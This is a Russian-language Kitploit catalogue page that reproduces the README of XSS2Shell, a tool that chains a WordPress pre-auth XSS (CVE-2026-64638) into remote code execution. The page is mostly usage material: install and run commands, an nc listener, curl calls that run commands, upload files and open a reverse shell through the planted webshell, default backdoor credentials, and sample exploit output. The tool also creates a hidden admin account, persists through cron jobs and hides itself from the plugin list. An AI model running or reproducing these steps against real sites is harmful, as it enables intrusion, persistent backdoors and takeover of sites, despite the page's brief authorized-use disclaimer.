Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
XSS2Shell — Эксплуатирует XSS-уязвимость WordPress до аутентификации (CVE-2026-64638) для достижения удалённого выполнения кода, устанавливая зашифрованный AES-бэкдор-вебшелл с функциями закрепления, загрузки файлов, reverse shell и скрытности для авторизованных red-team мероприятий. | Kitploit
Инструменты/GitHubGitHub/g0d150ne/xss2shell
Механизмы персистентностиЭксплуатацияЭксплуатация веб-приложенийСбор информацииПост-эксплуатацияКомандование и УправлениеRed TeamingИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubg0d150ne/xss2shell

XSS2Shell

Эксплуатирует XSS-уязвимость WordPress до аутентификации (CVE-2026-64638) для достижения удалённого выполнения кода, устанавливая зашифрованный AES-бэкдор-вебшелл с функциями закрепления, загрузки файлов, reverse shell и скрытности для авторизованных red-team мероприятий.

529 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Репозиторий
Поделиться

XSS2Shell ULTIMATE v3.0

Цепочка эксплойтов WordPress Pre-Auth XSS → RCE
Разработано G0D150NE

📌 Возможности

  • 🔍 Автоопределение XSS и версии WordPress
  • 🎯 3 режима: Auto, XSS, Direct
  • 📡 Callback-сервер для перехвата учётных данных
  • 🐚 WebShell с несколькими методами выполнения команд
  • 🔄 Персистентность (cron job, скрытый администратор, самокопирование)
  • 📁 Загрузка и скачивание файлов
  • 🖥️ Reverse shell в один клик
  • 🛡️ Стелс-режим (скрытие из списка плагинов)
  • 🔐 Бэкдор с шифрованием AES-256

📦 Установка

root@kitploit:~
# Clone
git clone https://github.com/g0d150ne/XSS2Shell.git
cd XSS2Shell

# Install dependencies
pip3 install requests beautifulsoup4 cryptography

# Run
python3 poc.py -h

🚀 Быстрый старт

1. Настройка слушателя

root@kitploit:~
# Open terminal for reverse shell
nc -lvnp 4444

2. Запуск эксплойта

Автоматический режим (рекомендуется)

root@kitploit:~
python3 poc.py http://target.com -u admin -p pass123 --lhost 192.168.1.100

Режим XSS (без учётных данных)

root@kitploit:~
python3 poc.py http://target.com --mode xss --lhost 192.168.1.100

Прямой режим (с учётными данными)

root@kitploit:~
python3 poc.py http://target.com -u admin -p pass123 --mode direct --lhost 192.168.1.100

🔧 Выполнение команд

После установки веб-шелла:

root@kitploit:~
# Base64 encoded (recommended)
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?b2h='$(echo -n 'id' | base64)

# Plain command
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?cmd=whoami'

# Upload file
curl -F '[email protected]' http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php

# Reverse shell
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?rev=1'

🎯 Примеры использования

root@kitploit:~
# 1. Auto scan + exploit
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5

# 2. XSS chain without credentials
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5

# 3. Custom port & plugin name
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --lport 1337 --slug backdoor

# 4. Change backdoor password
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --backdoor-pass MySecretPass

# 5. Custom callback port
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5 --callback-port 9999

📝 Параметры командной строки

ПараметрОписаниеПо умолчанию
targetЦелевой URL WordPressОбязательно
-u, --usernameИмя администратора WordPress-
-p, --wp-passПароль администратора WordPress-
--lhostIP-адрес слушателя127.0.0.1
--lportПорт слушателя4444
--modeРежим эксплойта (auto/xss/direct)auto
--slugSlug-имя плагинаg0d150ne
--callback-portПорт callback-сервера9090
--backdoor-passПароль бэкдораG0D150NE

🐚 Возможности WebShell

После успешной эксплуатации:

ВозможностьКоманда
Выполнение команды?b2h=BASE64_CMD
Загрузка файла-F '[email protected]'
Reverse shell?rev=1
Обычная команда?cmd=id
Зашифрованный бэкдор?decrypt=AES_DATA

Создан скрытый администратор:

  • Имя пользователя: sysadmin_{slug}
  • Пароль: {backdoor-pass} (по умолчанию: G0D150NE)

📸 Пример вывода

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║  Target   : http://wordpress-site.com
║  Attacker : 192.168.1.100:4444
║  Plugin   : g0d150ne
║  Mode     : AUTO
╚══════════════════════════════════════════════════════════════════╝

[•] Detecting WordPress version...
[+] WordPress version: 6.7.0
[•] Testing XSS vulnerability...
[+] XSS vulnerable! Vector: <area id=ajaxurl...
[+] Login successful as admin
[+] Plugin uploaded successfully
[+] Webshell ready: http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php
[+] Test: uid=33(www-data)

╔══════════════════════════════════════════════════════════════════╗
║  [+] EXPLOIT SUCCESSFUL                                          ║
╠══════════════════════════════════════════════════════════════════╣
║  WEBSHELL:                                                       ║
║    http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php    ║
║  ADMIN USER CREATED:                                             ║
║    Username: sysadmin_g0d150ne                                   ║
║    Password: G0D150NE                                            ║
╚══════════════════════════════════════════════════════════════════╝

🔧 Устранение неполадок

ПроблемаРешение
ModuleNotFoundErrorpip3 install requests beautifulsoup4 cryptography
Connection refusedПроверьте слушателя: nc -lvnp 4444
Login failedПроверьте учётные данные или используйте режим XSS
Plugin upload failedПроверьте права доступа, используйте другой slug
Argument conflictИспользуйте -p для wp-pass, --backdoor-pass для бэкдора

⚠️ Отказ от ответственности

Только для образовательных целей и авторизованного тестирования.
Используйте только на системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение.
Автор не несёт ответственности за любое неправомерное использование или причинённый ущерб.

📞 Контакты

  • Автор: G0D150NE
  • CVE: CVE-2026-64638
Скачать инструмент